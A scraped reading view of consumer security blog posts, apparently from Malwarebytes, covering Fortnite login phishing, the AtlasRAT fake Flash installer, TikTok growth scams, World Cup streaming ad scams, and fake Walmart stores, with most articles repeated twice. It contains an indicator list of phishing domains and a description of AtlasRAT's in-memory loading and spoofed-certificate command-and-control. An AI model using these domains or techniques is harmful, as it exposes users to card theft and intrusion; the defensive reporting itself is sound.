Reading view

Fake Fortnite rewards are stealing players’ accounts

Fortnite scam pages like the ones below appear by the dozen every day, recycled endlessly under different names and designs.

One version promises $50 from a fake superhero collaboration. Another claims it can calculate what your locker is worth. Both lead to the same destination: a fake Epic Games login page designed to steal your account. It’s an old trick, but it still catches people out.

The short version

If a website promises free V-Bucks, cash, or a tool to calculate your locker’s value, then asks you to log in with your Epic account to get it, it’s not run by Epic.

Epic doesn’t offer an official tool that values accounts, and no legitimate giveaway requires you to sign in through a third-party site. You’re just handing your Epic username and password to scammers.

If you or your child entered your Epic login details on one of these sites, assume the account has been compromised. Change the password immediately, turn on two-factor authentication, and don’t reuse that password on any other accounts.

Why do they want your login?

A stolen Fortnite account can be worth real money. Criminals can take over accounts with rare skins, spend any saved payment methods, sell the account on underground marketplaces, or use it to scam the owner’s friends. They may also try the same username and password on other online accounts, hoping the password has been reused.

Why Fortnite?

Fortnite still attracts around 110 million monthly players and has more than 650 million registered accounts. That alone makes it an attractive target for cybercriminals.

The audience’s age matters too. In December 2022, the US Federal Trade Commission (FTC) fined Epic Games a record $520 million, after alleging that the company knew children made up a substantial share of its player base and left voice and text chat turned on by default, exposing them to strangers. The Consumer Financial Protection Bureau (CFPB) also cites industry experts who say young gamers are especially vulnerable to phishing because they spend more time on social media and are less familiar with social engineering.

The game is also built around visible status. Skins, emotes, and pickaxes cost real money, making the idea that “your locker has a price” feel plausible. Rare or discontinued skins really do sell for hundreds of dollars on unofficial marketplaces, even though Epic offers no official way to cash out V-Bucks and selling accounts violates its terms of service. That kernel of truth is exactly what these locker-value scams exploit.

That’s also what makes them more convincing than a simple V-Bucks giveaway. Instead of promising something for nothing, they play on curiosity about something the player already owns. That’s probably why this version keeps coming back.

How the scam works

Some pages promise rewards:

Fake Fortnite giveaway

Others skip the free-reward pitch and frame the locker itself as hidden value the player is owed:

  • Fake Fortnite offers and tools
  • Fake Fortnite offers and tools
  • Fake Fortnite offers and tools

Others frame it as competition instead of currency:

  • Fake Fortnite competition
  • Fake Fortnite competition

The hook changes, but the fake login page doesn’t. These sites all do the same thing. They ask you to sign in with your Epic account so they can steal your username and password.

Another variant: Fake settlement claims

This one borrows a real story. Epic did settle with the FTC for $520 million, and real payments are still going out in 2026. But the real settlement pays actual dollars through the FTC’s own process, not in-game V-Bucks through an “Epic Games Locker,” and the claim window closed in July 2025.

References to an “EU Regulatory Mandate” and the case number shown on these pages don’t match any genuine legal action.

How to stay safe

Fortnite scams change constantly, but the advice doesn’t.

  • Use Malwarebytes Browser Guard to block known phishing sites before they have a chance to steal your login details.
  • Only sign in to your Epic account at epicgames.com. If another website asks for your Epic login, leave.
  • Be sceptical of offers that sound too good to be true. Free V-Bucks, locker valuations, and surprise rewards are all common phishing lures.
  • Verify refunds and settlements on the official source. If a page claims you’re owed money, check the regulator’s website yourself instead of following its links.
  • Turn on two-factor authentication (2FA). It can stop attackers from accessing your account even if they steal your password.
  • Use Malwarebytes Scam Guard. It can help you identify suspicious links and messages before you click.

What to do if you clicked

  • Change the Epic password immediately, going directly to epicgames.com, not through the suspicious link.
  • Turn on two-factor authentication if you haven’t already.
  • Check your linked email for password reset requests or login alerts you didn’t make.
  • Review connected devices/services on the account and remove anything unfamiliar.
  • If you entered payment details anywhere, contact your card issuer and monitor your statements.
  • Report the page to Epic’s support and flag it as phishing in your browser.
  • If the page claims to be part of a settlement or refund, verify it on the regulator’s official website. For the Epic settlement, that’s ftc.gov.

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

  •  

Fake Fortnite rewards are stealing players’ accounts

Fortnite scam pages like the ones below appear by the dozen every day, recycled endlessly under different names and designs.

One version promises $50 from a fake superhero collaboration. Another claims it can calculate what your locker is worth. Both lead to the same destination: a fake Epic Games login page designed to steal your account. It’s an old trick, but it still catches people out.

The short version

If a website promises free V-Bucks, cash, or a tool to calculate your locker’s value, then asks you to log in with your Epic account to get it, it’s not run by Epic.

Epic doesn’t offer an official tool that values accounts, and no legitimate giveaway requires you to sign in through a third-party site. You’re just handing your Epic username and password to scammers.

If you or your child entered your Epic login details on one of these sites, assume the account has been compromised. Change the password immediately, turn on two-factor authentication, and don’t reuse that password on any other accounts.

Why do they want your login?

A stolen Fortnite account can be worth real money. Criminals can take over accounts with rare skins, spend any saved payment methods, sell the account on underground marketplaces, or use it to scam the owner’s friends. They may also try the same username and password on other online accounts, hoping the password has been reused.

Why Fortnite?

Fortnite still attracts around 110 million monthly players and has more than 650 million registered accounts. That alone makes it an attractive target for cybercriminals.

The audience’s age matters too. In December 2022, the US Federal Trade Commission (FTC) fined Epic Games a record $520 million, after alleging that the company knew children made up a substantial share of its player base and left voice and text chat turned on by default, exposing them to strangers. The Consumer Financial Protection Bureau (CFPB) also cites industry experts who say young gamers are especially vulnerable to phishing because they spend more time on social media and are less familiar with social engineering.

The game is also built around visible status. Skins, emotes, and pickaxes cost real money, making the idea that “your locker has a price” feel plausible. Rare or discontinued skins really do sell for hundreds of dollars on unofficial marketplaces, even though Epic offers no official way to cash out V-Bucks and selling accounts violates its terms of service. That kernel of truth is exactly what these locker-value scams exploit.

That’s also what makes them more convincing than a simple V-Bucks giveaway. Instead of promising something for nothing, they play on curiosity about something the player already owns. That’s probably why this version keeps coming back.

How the scam works

Some pages promise rewards:

Fake Fortnite giveaway

Others skip the free-reward pitch and frame the locker itself as hidden value the player is owed:

  • Fake Fortnite offers and tools
  • Fake Fortnite offers and tools
  • Fake Fortnite offers and tools

Others frame it as competition instead of currency:

  • Fake Fortnite competition
  • Fake Fortnite competition

The hook changes, but the fake login page doesn’t. These sites all do the same thing. They ask you to sign in with your Epic account so they can steal your username and password.

Another variant: Fake settlement claims

This one borrows a real story. Epic did settle with the FTC for $520 million, and real payments are still going out in 2026. But the real settlement pays actual dollars through the FTC’s own process, not in-game V-Bucks through an “Epic Games Locker,” and the claim window closed in July 2025.

References to an “EU Regulatory Mandate” and the case number shown on these pages don’t match any genuine legal action.

How to stay safe

Fortnite scams change constantly, but the advice doesn’t.

  • Use Malwarebytes Browser Guard to block known phishing sites before they have a chance to steal your login details.
  • Only sign in to your Epic account at epicgames.com. If another website asks for your Epic login, leave.
  • Be sceptical of offers that sound too good to be true. Free V-Bucks, locker valuations, and surprise rewards are all common phishing lures.
  • Verify refunds and settlements on the official source. If a page claims you’re owed money, check the regulator’s website yourself instead of following its links.
  • Turn on two-factor authentication (2FA). It can stop attackers from accessing your account even if they steal your password.
  • Use Malwarebytes Scam Guard. It can help you identify suspicious links and messages before you click.

What to do if you clicked

  • Change the Epic password immediately, going directly to epicgames.com, not through the suspicious link.
  • Turn on two-factor authentication if you haven’t already.
  • Check your linked email for password reset requests or login alerts you didn’t make.
  • Review connected devices/services on the account and remove anything unfamiliar.
  • If you entered payment details anywhere, contact your card issuer and monitor your statements.
  • Report the page to Epic’s support and flag it as phishing in your browser.
  • If the page claims to be part of a settlement or refund, verify it on the regulator’s official website. For the Epic settlement, that’s ftc.gov.

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

  •  

Fake Flash Player installs AtlasRAT

Researchers have described a campaign that delivers a remote access Trojan (RAT) called AtlasRAT through a fake Flash Player installer.

People still go looking for “Flash player” because a surprising amount of content and software was built around Flash and never properly migrated. Users often just want a quick way to get those old sites, games, or business apps working again.

The underlying problem is that Adobe ended support for Flash Player on December 31, 2020, and actively blocks Flash content from running in the official player.

Attackers know some people will still search for Flash to run a game or a business app, so they wrap their malware in a fake Flash‑related installer that looks familiar and legitimate.

That’s likely why the AtlasRAT infection chain starts with a Delphi executable named FlashPlay.Exe, masquerading as an “AGE Flash Player” installer. The first-stage loader runs entirely in memory and reconstructs additional payloads instead of dropping obvious files to disk, a technique often referred to as fileless malware.

The final payload (MainDll.Dll) uses a self‑signed certificate spoofing CN=update.Microsoft.Com to initialize Transport Layer Security (TLS) client communication and encrypts Command and Control (C2) traffic.

A self‑signed certificate means the owner signs with their own key instead of a trusted certificate authority (CA). That means an attacker can create a certificate claiming to be update.microsoft.com or google.com, even though they don’t control those domains. A web browser would reject such a certificate with a warning. Custom malware, however, can simply ignore the operating system’s trust checks and use it to set up encrypted C2.

Once AtlasRAT is installed, the operator gains long‑term remote control of the infected Windows system with capabilities including:

  • Collecting credentials via offline keylogging
  • Gathering system information and identifying installed security products
  • Exfiltrating data over encrypted channels
  • Injecting DLLs into applications like WeChat, potentially allowing the attacker to monitor or manipulate messaging, or to hide malware activity or connectivity.

Based on historical data, the researchers suspect that AtlasRAT is a reusable framework or commercial offering rather than a one-off tool used by a single group.

How to stay safe

When looking for apps and software to perform a specific task, remember that cybercriminals often exploit popular searches in semi-targeted attacks. In previous campaigns, for example, AtlasRAT has also been distributed as a fake VPN installer.

Some tips to keep this RAT, and others, off your computer:

  • Carefully check what you’re about to install. Sponsored search results are not a guarantee that software is legitimate.
  • Use an up-to-date, real-time anti-malware solution to detect and block remote access Trojans. Malwarebytes detected AtlasRAT as Malware.AI.1710771908
  • Keep your operating system, browser, and security software up to date.

From reporting threats to removing them.

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

  •  

Fake Flash Player installs AtlasRAT

Researchers have described a campaign that delivers a remote access Trojan (RAT) called AtlasRAT through a fake Flash Player installer.

People still go looking for “Flash player” because a surprising amount of content and software was built around Flash and never properly migrated. Users often just want a quick way to get those old sites, games, or business apps working again.

The underlying problem is that Adobe ended support for Flash Player on December 31, 2020, and actively blocks Flash content from running in the official player.

Attackers know some people will still search for Flash to run a game or a business app, so they wrap their malware in a fake Flash‑related installer that looks familiar and legitimate.

That’s likely why the AtlasRAT infection chain starts with a Delphi executable named FlashPlay.Exe, masquerading as an “AGE Flash Player” installer. The first-stage loader runs entirely in memory and reconstructs additional payloads instead of dropping obvious files to disk, a technique often referred to as fileless malware.

The final payload (MainDll.Dll) uses a self‑signed certificate spoofing CN=update.Microsoft.Com to initialize Transport Layer Security (TLS) client communication and encrypts Command and Control (C2) traffic.

A self‑signed certificate means the owner signs with their own key instead of a trusted certificate authority (CA). That means an attacker can create a certificate claiming to be update.microsoft.com or google.com, even though they don’t control those domains. A web browser would reject such a certificate with a warning. Custom malware, however, can simply ignore the operating system’s trust checks and use it to set up encrypted C2.

Once AtlasRAT is installed, the operator gains long‑term remote control of the infected Windows system with capabilities including:

  • Collecting credentials via offline keylogging
  • Gathering system information and identifying installed security products
  • Exfiltrating data over encrypted channels
  • Injecting DLLs into applications like WeChat, potentially allowing the attacker to monitor or manipulate messaging, or to hide malware activity or connectivity.

Based on historical data, the researchers suspect that AtlasRAT is a reusable framework or commercial offering rather than a one-off tool used by a single group.

How to stay safe

When looking for apps and software to perform a specific task, remember that cybercriminals often exploit popular searches in semi-targeted attacks. In previous campaigns, for example, AtlasRAT has also been distributed as a fake VPN installer.

Some tips to keep this RAT, and others, off your computer:

  • Carefully check what you’re about to install. Sponsored search results are not a guarantee that software is legitimate.
  • Use an up-to-date, real-time anti-malware solution to detect and block remote access Trojans. Malwarebytes detected AtlasRAT as Malware.AI.1710771908
  • Keep your operating system, browser, and security software up to date.

From reporting threats to removing them.

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

  •  

Buying TikTok views or followers? Here’s what you’re really getting

A whole industry has sprung up around selling TikTok “growth.”

Cheap views by the hundred, pre-made ad accounts, and polished sales pages promising a repeatable path to serious revenue.

None of it is officially sanctioned by TikTok, and depending on what you’re buying, you could end up wasting money, losing your account, or handing your login details to scammers.

Scam 1: Sites selling cheap likes and engagement

Sites selling bulk engagement all look remarkably similar.

They offer small bundles of views, likes, or followers for a few pounds, usually alongside identical packages for YouTube, Instagram, and other platforms.

The sales pitch is almost always the same: “100% real profiles,” “no bots, no click farms,” and “completely safe.”

Those claims are worth reading carefully because they’re addressing the biggest concern buyers already have.

At this price point, bulk engagement is usually generated through bots, click farms, or other artificial means—the very thing these sites insist they don’t use.

Even if your engagement numbers increase initially, TikTok’s fraud detection systems can remove artificial engagement, and accounts that repeatedly use these services risk being flagged or restricted.

Scam 2: The “aged” ad account marketplace

Another common offer is bulk TikTok Ads accounts sold as “aged” or “trusted,” often bundled with a replacement guarantee if an account stops working. The pitch is that you skip the hassle of setting up and verifying a new advertising account.

The problem is that you don’t know how those accounts were created. Many are built using stolen or synthetic identities, compromised payment details, or other deceptive methods. Buying one means inheriting that history—and the very real risk that TikTok detects it and suspends the account, along with any campaigns or ad budget attached to it. A replacement guarantee won’t help if your advertising is suddenly brought to a halt.

Scam 3: The growth framework

A third type of offer is less obviously a scam and more of a marketing funnel.

Slick landing pages—often hosted on free platforms and paired with an embedded video—promise a “proven blueprint” for turning TikTok into a major source of income, usually backed by impressive but unverifiable claims about past clients.

Companies offering TikTok growth frameworks

The immediate goal is usually to collect your email address, and sometimes your phone number, before revealing what’s actually for sale. That might be a paid course, a “done-for-you” management service, or a request for direct access to your TikTok Shop or Ads account.

What happens next varies, but the common thread is the same: you’re being asked to trust an unverified third party with your business, your money, or your account.

What you’re really signing up for

Not every TikTok marketing service is a scam. But if someone’s offering thousands of views for a few pounds, bulk “aged” ad accounts, or guaranteed growth, you’re in a very different part of the market.

These services promise shortcuts. What they often deliver is fake engagement, accounts with questionable histories, or requests for access to your own account.

At best, you’ve wasted your money on engagement TikTok later strips away. At worst, you’re buying an account built on stolen information or giving an untrusted third party full access to your own.

Our advice

  • Don’t pay for views, likes, or followers. Artificial engagement isn’t real growth and can put your account at risk under TikTok’s rules.
  • Never share your TikTok username and password with a “boosting” service, regardless of how it’s presented.
  • Don’t buy or sell TikTok Ads or Business accounts outside TikTok’s own account creation process.
  • Treat “guaranteed revenue” frameworks and courses like any other business opportunity: they’re sales pages first, educational content second.

None of this is unique to TikTok. The platform’s explosive growth has simply given a familiar ecosystem of low-effort scams a new audience.


Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

  •  

Buying TikTok views or followers? Here’s what you’re really getting

A whole industry has sprung up around selling TikTok “growth.”

Cheap views by the hundred, pre-made ad accounts, and polished sales pages promising a repeatable path to serious revenue.

None of it is officially sanctioned by TikTok, and depending on what you’re buying, you could end up wasting money, losing your account, or handing your login details to scammers.

Scam 1: Sites selling cheap likes and engagement

Sites selling bulk engagement all look remarkably similar.

They offer small bundles of views, likes, or followers for a few pounds, usually alongside identical packages for YouTube, Instagram, and other platforms.

The sales pitch is almost always the same: “100% real profiles,” “no bots, no click farms,” and “completely safe.”

Those claims are worth reading carefully because they’re addressing the biggest concern buyers already have.

At this price point, bulk engagement is usually generated through bots, click farms, or other artificial means—the very thing these sites insist they don’t use.

Even if your engagement numbers increase initially, TikTok’s fraud detection systems can remove artificial engagement, and accounts that repeatedly use these services risk being flagged or restricted.

Scam 2: The “aged” ad account marketplace

Another common offer is bulk TikTok Ads accounts sold as “aged” or “trusted,” often bundled with a replacement guarantee if an account stops working. The pitch is that you skip the hassle of setting up and verifying a new advertising account.

The problem is that you don’t know how those accounts were created. Many are built using stolen or synthetic identities, compromised payment details, or other deceptive methods. Buying one means inheriting that history—and the very real risk that TikTok detects it and suspends the account, along with any campaigns or ad budget attached to it. A replacement guarantee won’t help if your advertising is suddenly brought to a halt.

Scam 3: The growth framework

A third type of offer is less obviously a scam and more of a marketing funnel.

Slick landing pages—often hosted on free platforms and paired with an embedded video—promise a “proven blueprint” for turning TikTok into a major source of income, usually backed by impressive but unverifiable claims about past clients.

Companies offering TikTok growth frameworks

The immediate goal is usually to collect your email address, and sometimes your phone number, before revealing what’s actually for sale. That might be a paid course, a “done-for-you” management service, or a request for direct access to your TikTok Shop or Ads account.

What happens next varies, but the common thread is the same: you’re being asked to trust an unverified third party with your business, your money, or your account.

What you’re really signing up for

Not every TikTok marketing service is a scam. But if someone’s offering thousands of views for a few pounds, bulk “aged” ad accounts, or guaranteed growth, you’re in a very different part of the market.

These services promise shortcuts. What they often deliver is fake engagement, accounts with questionable histories, or requests for access to your own account.

At best, you’ve wasted your money on engagement TikTok later strips away. At worst, you’re buying an account built on stolen information or giving an untrusted third party full access to your own.

Our advice

  • Don’t pay for views, likes, or followers. Artificial engagement isn’t real growth and can put your account at risk under TikTok’s rules.
  • Never share your TikTok username and password with a “boosting” service, regardless of how it’s presented.
  • Don’t buy or sell TikTok Ads or Business accounts outside TikTok’s own account creation process.
  • Treat “guaranteed revenue” frameworks and courses like any other business opportunity: they’re sales pages first, educational content second.

None of this is unique to TikTok. The platform’s explosive growth has simply given a familiar ecosystem of low-effort scams a new audience.


Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

  •  

We found 120 fake Walmart stores trying to steal your credit card

Shoppers browsing on their phones are landing on convincing Walmart lookalike sites offering name-brand liquor at 40% to 70% off, only to be led straight to a checkout page asking for a full credit card number, expiry date, and CVV.

The sites have no connection to Walmart. They’re part of a network of more than 120 near-identical domains built to look like a legitimate retailer just long enough to steal your card details.

Fake Walmart websites

The name “Walmart” is doing most of the work here. It’s one of the most recognized retailers in the world, and it’s that familiarity that makes people lower their guard. A shopper who’d hesitate on an unfamiliar website may think nothing of an unusually large discount because the logo, colours, and layout look familiar.

That trust hasn’t been earned by the site. It’s borrowed from a brand that has nothing to do with it.

If you’ve entered your card details on one of these pages, the safest assumption is that your card has been compromised.

How the scam works

The scam follows a simple pattern: a Walmart-branded homepage, category pages stacked with heavily discounted liquor, and a checkout form asking for full card details.

The discounts do much of the persuading. Seeing premium brands advertised at 60% or 70% off encourages people to buy first and ask questions later.

Heavy discounts offered on a fake Walmart site
Product pages on a fake Walmart site
Collecting card details on a fake Walmart site

The same WordPress/WooCommerce template powers every site in the network. They share the same product catalogue, prices, and images. The only differences are fabricated US business addresses and phone numbers that are swapped out for each domain.

How to avoid this scam

  • Be sceptical of discounts that don’t match a retailer’s usual promotions, especially on liquor or electronics.
  • Check the address bar before entering payment details. A genuine Walmart sale won’t send you to an unfamiliar .shop domain.
  • Use tools that can identify scam websites automatically, such as Malwarebytes Browser Guard on desktop, or ask Scam Guard if it thinks a domain is suspicious.
  • On mobile, where these sites are designed to work, Malwarebytes Mobile Security can block known phishing and scam domains before you reach the checkout.

If you already entered your card details

  • Contact your card issuer immediately. Explain what happened and ask whether the card should be cancelled and replaced.
  • Watch your account for unauthorized charges, including small “test” transactions.
  • Report the domain through your browser’s phishing reporting feature and to the FTC at reportfraud.ftc.gov if you’re in the US.

The simplest defence is also the most effective: if a retailer needs a lookalike domain to sell you something, it’s probably a scam.

Indicators of Compromise (IOCs)

allgoodscenter.shop, allneedsbay.shop, allneedslane.shop, allneedsmarket.shop, allneedsstore.shop, allpurposebay.shop, basketandmore.shop, broadbasket.shop, broadbasketbay.shop, broadbasketco.shop, broadbasketlane.shop, broadbasketplace.shop, broadbasketway.shop, broadchoice.shop, broadgoodsbay.shop, broadgoodscenter.shop, broadgoodsplace.shop, broadgoodsway.shop, broadmarketplacehub.shop, broadutility.shop, broadutilityhub.shop, broadvalue.shop, broadvaluebay.shop, broadvalueplace.shop, cartandcrate.shop, completehomegoods.shop, dailybasketport.shop, dailybasketway.shop, dailychoiceway.shop, dailycrate.shop, dailyfindslane.shop, dailygoodscrest.shop, dailygoodsfield.shop, dailygoodspark.shop, dailygoodsridge.shop, dailygoodsway.shop, dailygoodswayhub.shop, dailyhomemarket.shop, dailyutilitybay.shop, dailyutilityway.shop, everydaycartshop.shop, everydayneedsco.shop, everydayvaluebay.shop, generalcart.shop, generalcartlane.shop, generalgoodsport.shop, generalgoodsridge.shop, generalgoodsway.shop, generalgoodsyard.shop, generalmarketbay.shop, generalmarketfield.shop, generalneedsplace.shop, generalvaluebay.shop, goodsandhomebay.shop, goodsandhomeco.shop, goodsandhomehub.shop, goodsandlivinghub.shop, goodsandmoreco.shop, goodsandvaluehub.shop, goodsdistrict.shop, goodslanding.shop, goodsmeadow.shop, goodsroute.shop, goodsvalley.shop, homeandutility.shop, homebasketlane.shop, homebasketway.shop, homecartcenter.shop, homefieldmarket.shop, homefindsco.shop, homegoodscrate.shop, homegoodsport.shop, homegoodsway.shop, homelivinggoods.shop, homeneedslane.shop, homeneedsmarket.shop, homeparcel.shop, homesteadmart.shop, homeutilitystore.shop, homevaluebay.shop, homevalueplace.shop, homevalueway.shop, marketbasketcenter.shop, marketcanvas.shop, marketchoicebay.shop, marketchoiceplace.shop, marketfieldhub.shop, marketfindsbay.shop, marketfoundry.shop, marketgrovehub.shop, markethomeplace.shop, marketpillar.shop, marketpine.shop, marketridge.shop, markettrailway.shop, marketwarehouse.shop, modernsupplyhub.shop, smartbasketplace.shop, smartdailygoods.shop, smartneedshub.shop, smartutilityhub.shop, smartvaluebay.shop, trustedgoods.shop, usefulbasketlane.shop, usefulcartcenter.shop, usefulchoicebay.shop, usefuldailyhub.shop, usefulgoodsbay.shop, usefulgoodscenter.shop, usefulgoodspark.shop, usefulgoodsway.shop, usefulgoodswayhub.shop, usefulgoodsyard.shop, usefulmarket.shop, usefulmarketbay.shop, usefulshelf.shop, usefulutility.shop, usefulvalueplace.shop, utilitygoods.shop, valuechoicebay.shop, valuegoodspark.shop, valuegoodsridge.shop, valuegrove.shop, valueparcel.shop


Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

  •  

We found 120 fake Walmart stores trying to steal your credit card

Shoppers browsing on their phones are landing on convincing Walmart lookalike sites offering name-brand liquor at 40% to 70% off, only to be led straight to a checkout page asking for a full credit card number, expiry date, and CVV.

The sites have no connection to Walmart. They’re part of a network of more than 120 near-identical domains built to look like a legitimate retailer just long enough to steal your card details.

Fake Walmart websites

The name “Walmart” is doing most of the work here. It’s one of the most recognized retailers in the world, and it’s that familiarity that makes people lower their guard. A shopper who’d hesitate on an unfamiliar website may think nothing of an unusually large discount because the logo, colours, and layout look familiar.

That trust hasn’t been earned by the site. It’s borrowed from a brand that has nothing to do with it.

If you’ve entered your card details on one of these pages, the safest assumption is that your card has been compromised.

How the scam works

The scam follows a simple pattern: a Walmart-branded homepage, category pages stacked with heavily discounted liquor, and a checkout form asking for full card details.

The discounts do much of the persuading. Seeing premium brands advertised at 60% or 70% off encourages people to buy first and ask questions later.

Heavy discounts offered on a fake Walmart site
Product pages on a fake Walmart site
Collecting card details on a fake Walmart site

The same WordPress/WooCommerce template powers every site in the network. They share the same product catalogue, prices, and images. The only differences are fabricated US business addresses and phone numbers that are swapped out for each domain.

How to avoid this scam

  • Be sceptical of discounts that don’t match a retailer’s usual promotions, especially on liquor or electronics.
  • Check the address bar before entering payment details. A genuine Walmart sale won’t send you to an unfamiliar .shop domain.
  • Use tools that can identify scam websites automatically, such as Malwarebytes Browser Guard on desktop, or ask Scam Guard if it thinks a domain is suspicious.
  • On mobile, where these sites are designed to work, Malwarebytes Mobile Security can block known phishing and scam domains before you reach the checkout.

If you already entered your card details

  • Contact your card issuer immediately. Explain what happened and ask whether the card should be cancelled and replaced.
  • Watch your account for unauthorized charges, including small “test” transactions.
  • Report the domain through your browser’s phishing reporting feature and to the FTC at reportfraud.ftc.gov if you’re in the US.

The simplest defence is also the most effective: if a retailer needs a lookalike domain to sell you something, it’s probably a scam.

Indicators of Compromise (IOCs)

allgoodscenter.shop, allneedsbay.shop, allneedslane.shop, allneedsmarket.shop, allneedsstore.shop, allpurposebay.shop, basketandmore.shop, broadbasket.shop, broadbasketbay.shop, broadbasketco.shop, broadbasketlane.shop, broadbasketplace.shop, broadbasketway.shop, broadchoice.shop, broadgoodsbay.shop, broadgoodscenter.shop, broadgoodsplace.shop, broadgoodsway.shop, broadmarketplacehub.shop, broadutility.shop, broadutilityhub.shop, broadvalue.shop, broadvaluebay.shop, broadvalueplace.shop, cartandcrate.shop, completehomegoods.shop, dailybasketport.shop, dailybasketway.shop, dailychoiceway.shop, dailycrate.shop, dailyfindslane.shop, dailygoodscrest.shop, dailygoodsfield.shop, dailygoodspark.shop, dailygoodsridge.shop, dailygoodsway.shop, dailygoodswayhub.shop, dailyhomemarket.shop, dailyutilitybay.shop, dailyutilityway.shop, everydaycartshop.shop, everydayneedsco.shop, everydayvaluebay.shop, generalcart.shop, generalcartlane.shop, generalgoodsport.shop, generalgoodsridge.shop, generalgoodsway.shop, generalgoodsyard.shop, generalmarketbay.shop, generalmarketfield.shop, generalneedsplace.shop, generalvaluebay.shop, goodsandhomebay.shop, goodsandhomeco.shop, goodsandhomehub.shop, goodsandlivinghub.shop, goodsandmoreco.shop, goodsandvaluehub.shop, goodsdistrict.shop, goodslanding.shop, goodsmeadow.shop, goodsroute.shop, goodsvalley.shop, homeandutility.shop, homebasketlane.shop, homebasketway.shop, homecartcenter.shop, homefieldmarket.shop, homefindsco.shop, homegoodscrate.shop, homegoodsport.shop, homegoodsway.shop, homelivinggoods.shop, homeneedslane.shop, homeneedsmarket.shop, homeparcel.shop, homesteadmart.shop, homeutilitystore.shop, homevaluebay.shop, homevalueplace.shop, homevalueway.shop, marketbasketcenter.shop, marketcanvas.shop, marketchoicebay.shop, marketchoiceplace.shop, marketfieldhub.shop, marketfindsbay.shop, marketfoundry.shop, marketgrovehub.shop, markethomeplace.shop, marketpillar.shop, marketpine.shop, marketridge.shop, markettrailway.shop, marketwarehouse.shop, modernsupplyhub.shop, smartbasketplace.shop, smartdailygoods.shop, smartneedshub.shop, smartutilityhub.shop, smartvaluebay.shop, trustedgoods.shop, usefulbasketlane.shop, usefulcartcenter.shop, usefulchoicebay.shop, usefuldailyhub.shop, usefulgoodsbay.shop, usefulgoodscenter.shop, usefulgoodspark.shop, usefulgoodsway.shop, usefulgoodswayhub.shop, usefulgoodsyard.shop, usefulmarket.shop, usefulmarketbay.shop, usefulshelf.shop, usefulutility.shop, usefulvalueplace.shop, utilitygoods.shop, valuechoicebay.shop, valuegoodspark.shop, valuegoodsridge.shop, valuegrove.shop, valueparcel.shop


Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

  •  

“Free World Cup stream” sites are serving scams, not football

With the World Cup on, you’ll find no shortage of websites promising every match, live, in HD, for free. They look convincing, usually with a video player, a “Live Stream Available” indicator, a row of server buttons, maybe a match schedule, and a “Watch Live” button. There’s no signup, no paywall, and seemingly, no catch.

But of course there’s a catch. These sites aren’t really in the business of streaming football. What the page is really built to do is fire pop-ups, hidden ads, and redirects through an advertising network we detect as malicious. Instead of watching the match, visitors end up facing scams, malware, and fraudulent downloads.

Here’s how the scam works and how to stay out of it.

.kb-advanced-slider-423028_956a35-72 .kb-slider-pause-button{color:#fff;background-color:rgba(0, 0, 0, 0.8);border:1px solid transparent;}

    If they’re not real streaming sites, what are they?

    We’ve identified more than 40 websites that are effectively identical. They use different World Cup-themed names, but behind the scenes they’re running the same page template, the same code, and the same advertising infrastructure.

    A script generates a separate page for every match, making the operation cheap to run and easy to scale.

    When a stream appears at all, it’s usually embedded from a third-party piracy service. The real business is the advertising surrounding the player.

    A typical page loads eight or more ad and tracking scripts from the same shady network, plus a handful of other ad domains. The hub the whole page is wired to is a domain we detect as malicious. Your data is the product; the “stream” is the bait.

    Why these sites are dangerous, not just annoying

    It’s tempting to shrug this off as the usual price of free streams. But it’s worse than facing a few annoying ads.

    The real threat is the ad network. This isn’t mainstream, vetted advertising. The kind of ad network we flag as malicious is a common delivery route for the stuff that causes harm: fake virus warnings, bogus software update prompts that install malware, fake prize and verification pages, and forced redirects into subscription traps.

    The video window itself is untrusted. The stream is pulled from a third-party piracy service, not anything the site controls or vets. Pirated stream embeds are a well-known source of their own ads, redirects, and hidden clickable overlays, so even the part that looks like a video player can be working against you.

    There’s nobody behind the counter. These are anonymous, disposable sites built around a major sporting event. There’s no real company, no support, no accountability, and no reason for them to care what lands on your screen.

    It’s the oldest play in the scam handbook: take something millions of people want right now, present it nicely, and monetize the rush. Scammers don’t create the demand, they just stand in front of it with a bucket and collect payment.

    How it works (a quick technical version)

    The first tap is hijacked. A script waits for your first click or tap anywhere on the page and uses it to open an ad in a new tab or window, often in the background. Before you’ve watched a second of football, you’ve already triggered an ad.

    The “Play” button is a maze. Clicking Play doesn’t play anything. Instead, you’re sent through prompts like “Click Resume to continue” before you might reach a video. Every extra step is another click, and each click triggers more ads.

    Invisible ads load. The page quietly loads tiny, invisible 1×1-pixel ads and opens more tabs. These exist purely to generate paid ad views. The tactic has many of the hallmarks of ad fraud, and you’re the unwitting traffic. More ads are injected into the player area the moment you try to watch.

    The stream is an afterthought. Often there’s no working stream at all, so the page loops you through “Streams loading… Retry,” which means more clicks and more ads. Whether you ever see the match or not, the ads have already cashed in.

    What the ads are serving up

    The code fires the ads; but here’s what comes out the other end. On these pages, the injected ads tend to fall into two buckets, and neither has anything to do with football.

    The first is fake message notifications: little pop-ups designed to look like real chat alerts, complete with a stranger’s photo and messages such as “Seen my message yet? Let’s talk!” Some include fake voice messages or explicit thumbnails. They’re made to look like notifications you’ve forgotten to check so you’ll click them.

    The second is crypto bait. These ads promote “play-to-earn” games with promises of daily rewards, surprise drops, massive airdrops, and eye-catching claims like a “124% APY yield engine.”

    One warning sign is the promise of guaranteed triple-digit returns and free money for tapping a button. That’s not how legitimate financial products work.

    That’s the whole machine working end to end: football is the doorway, the malicious advertising network is the engine, and the scams are what it’s actually selling.

    How to watch the World Cup safely

    These “Free HD stream, every match, no catch” sites use football as bait to funnel visitors through a malicious advertising network. Here’s how to stay safe:

    • Use official broadcasters and streaming services. That’s where the legal and safe coverage lives.
    • Treat “every match, free, HD, no signup” as a red flag. Broadcast rights are expensive. If a random website is giving everything away for free, it’s making money some other way.
